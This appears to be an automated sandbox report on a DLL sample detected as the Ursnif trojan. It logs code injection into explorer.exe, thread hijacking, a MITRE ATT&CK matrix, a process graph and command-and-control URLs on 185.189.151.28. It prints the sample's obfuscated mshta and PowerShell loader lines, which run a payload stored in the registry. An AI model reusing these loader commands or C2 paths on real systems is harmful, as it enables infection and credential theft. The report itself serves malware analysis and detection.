                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 360000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2490000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 35E000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 4B0000Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FF802BC1580Jump to behavior
                      Changes memory attributes in foreign processes to executable or writable
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute readJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FF802BC1580 protect: page execute and read and writeJump to behavior
                      Allocates memory in foreign processes
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\control.exe base: 4B0000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 4B0000 protect: page execute and read and writeJump to behavior
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 360000 value: 00Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EBJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 2490000 value: 80Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 35E000 value: 00Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EBJump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 4B0000 value: 80Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3616 base: 7FF802BC1580 value: 40Jump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 4084Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3616Jump to behavior
                      Source: C:\Windows\System32\control.exeThread register set: target process: 3616Jump to behavior
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580Jump to behavior
                      Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580Jump to behavior
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5 Jump to behavior
                      Source: explorer.exe, 0000001D.00000000.434255940.0000000005610000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.425378070.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.434267332.0000000005E60000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 0000001D.00000000.425378070.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455054907.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.424853777.00000000005C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 0000001D.00000000.425378070.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455231831.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455646233.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
                      Source: explorer.exe, 0000001D.00000000.425378070.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455231831.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455646233.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03433365 cpuid 2_2_03433365
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034881F1 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,2_2_034881F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034341FA HeapFree,GetSystemTimeAsFileTime,HeapFree,2_2_034341FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03436D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,2_2_03436D78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03433365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,2_2_03433365

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5132, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.3430000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5132, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4084, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.5596b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.3430000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.50494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.55694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54ea4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      1
                      Valid Accounts                      		1
                      Windows Management Instrumentation                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		1
                      Obfuscated Files or Information                      		1
                      Input Capture                      		1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts3
                      Native API                      		Boot or Logon Initialization Scripts1
                      Access Token Manipulation                      		1
                      File Deletion                      		LSASS Memory1
                      Account Discovery                      		Remote Desktop Protocol1
                      Email Collection                      		Exfiltration Over Bluetooth2
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter                      		Logon Script (Windows)813
                      Process Injection                      		1
                      Masquerading                      		Security Account Manager3
                      File and Directory Discovery                      		SMB/Windows Admin Shares1
                      Input Capture                      		Automated Exfiltration1
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Valid Accounts                      		NTDS25
                      System Information Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Access Token Manipulation                      		LSA Secrets1
                      Query Registry                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common31
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials11
                      Security Software Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items813
                      Process Injection                      		DCSync31
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32                      		Proc Filesystem3
                      Process Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery                      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery                      		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                      System Network Configuration Discovery                      		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 620332 Sample: xaj0e933Uv.dll Startdate: 04/05/2022 Architecture: WINDOWS Score: 100 66 Snort IDS alert for network traffic 2->66 68 Found malware configuration 2->68 70 Multi AV Scanner detection for submitted file 2->70 72 2 other signatures 2->72 11 loaddll32.exe 1 2->11         started        13 mshta.exe 19 2->13         started        process3 process4 15 cmd.exe 1 11->15         started        17 powershell.exe 33 13->17         started        signatures5 20 rundll32.exe 1 6 15->20         started        58 Injects code into the Windows Explorer (explorer.exe) 17->58 60 Writes to foreign memory regions 17->60 62 Modifies the context of a thread in another process (thread injection) 17->62 64 2 other signatures 17->64 24 csc.exe 3 17->24         started        27 csc.exe 3 17->27         started        29 conhost.exe 17->29         started        process6 dnsIp7 56 185.189.151.28, 49769, 80 AS-SOFTPLUSCH Switzerland 20->56 74 System process connects to network (likely due to code injection or exploit) 20->74 76 Writes to foreign memory regions 20->76 78 Allocates memory in foreign processes 20->78 80 3 other signatures 20->80 31 control.exe 1 20->31         started        52 C:\Users\user\AppData\Local\...\m5pod5s5.dll, PE32 24->52 dropped 34 cvtres.exe 1 24->34         started        54 C:\Users\user\AppData\Local\...\a1gxko15.dll, PE32 27->54 dropped 36 cvtres.exe 1 27->36         started        file8 signatures9 process10 signatures11 90 Changes memory attributes in foreign processes to executable or writable 31->90 92 Injects code into the Windows Explorer (explorer.exe) 31->92 94 Writes to foreign memory regions 31->94 96 4 other signatures 31->96 38 explorer.exe 2 31->38 injected process12 signatures13 82 Self deletion via cmd delete 38->82 84 Disables SPDY (HTTP compression, likely to perform web injects) 38->84 41 cmd.exe 1 38->41         started        44 RuntimeBroker.exe 38->44 injected 46 cmd.exe 38->46         started        process14 signatures15 86 Uses ping.exe to sleep 41->86 88 Uses ping.exe to check the status of other devices and networks 41->88 48 conhost.exe 41->48         started        50 PING.EXE 1 41->50         started        process16

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      xaj0e933Uv.dll40%VirustotalBrowse
                      xaj0e933Uv.dll48%ReversingLabsWin32.Trojan.Zenpak
                      xaj0e933Uv.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.rundll32.exe.3430000.0.unpack100%AviraHEUR/AGEN.1245293Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      l-0007.l-dc-msedge.net0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://185.189.151.28/0%Avira URL Cloudsafe
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGS0%Avira URL Cloudsafe
                      http://crl.osofts/Microt00%URL Reputationsafe
                      http://185.189.151.28/drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_20%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://crl.micro0%URL Reputationsafe
                      http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk0%Avira URL Cloudsafe
                      http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_20%Avira URL Cloudsafe
                      http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      l-0007.l-dc-msedge.net
                      		13.107.43.16
                      		truetrueunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
